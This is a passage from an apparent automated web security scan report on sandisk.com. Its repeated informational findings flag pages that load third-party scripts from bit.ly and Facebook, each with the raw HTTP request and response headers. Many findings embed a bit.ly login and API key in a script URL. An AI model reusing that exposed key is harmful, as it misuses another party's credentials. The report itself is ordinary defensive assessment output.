...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.66. http://www.sandisk.com/about-sandisk/privacy-policy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/privacy-policy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/privacy-policy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39795
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.67. http://www.sandisk.com/about-sandisk/privacy-policy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/privacy-policy/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/privacy-policy/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39796
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.68. http://www.sandisk.com/about-sandisk/privacy-policy/archived-privacypolicy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/privacy-policy/archived-privacypolicy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/privacy-policy/archived-privacypolicy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/privacy-policy
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37806
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.69. http://www.sandisk.com/about-sandisk/privacy-policy/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/privacy-policy/faq

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/privacy-policy/faq HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/privacy-policy
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22840
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.70. http://www.sandisk.com/about-sandisk/procurement--global-supply-base-management  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/procurement--global-supply-base-management

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/procurement--global-supply-base-management HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16434
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.71. http://www.sandisk.com/about-sandisk/terms-of-use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/terms-of-use

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/terms-of-use HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24872
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.72. http://www.sandisk.com/about-sandisk/worldwide-locations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/worldwide-locations HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18850
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.73. http://www.sandisk.com/about-sandisk/worldwide-locations/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/worldwide-locations/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18851
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.74. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk--israel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations/sandisk--israel

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/worldwide-locations/sandisk--israel HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/worldwide-locations
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17497
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.75. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-asia-pacific  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations/sandisk-asia-pacific

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/worldwide-locations/sandisk-asia-pacific HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/worldwide-locations
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19002
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.76. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-europe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations/sandisk-europe

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/worldwide-locations/sandisk-europe HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/worldwide-locations
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17540
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.77. http://www.sandisk.com/business-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35895
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.78. http://www.sandisk.com/business-solutions/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/contact-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15607
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.79. http://www.sandisk.com/business-solutions/embedded-products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/embedded-products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/embedded-products HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37544
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.80. http://www.sandisk.com/business-solutions/embedded-products.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/embedded-products.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/embedded-products.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37549
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.81. http://www.sandisk.com/business-solutions/embedded-products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/embedded-products/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/embedded-products/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37545
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.82. http://www.sandisk.com/business-solutions/embedded-products/inand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/embedded-products/inand

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/embedded-products/inand HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/embedded-products
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37581
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.83. http://www.sandisk.com/business-solutions/find-a-distributor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/find-a-distributor

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/find-a-distributor HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19642
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=ysssvz55hrpsoeep5niw5145; path=/; HttpOnly
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.84. http://www.sandisk.com/business-solutions/flash-memory-cards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/flash-memory-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38736
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.85. http://www.sandisk.com/business-solutions/flash-memory-cards.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/flash-memory-cards.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38741
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:58 GMT
Connection: close


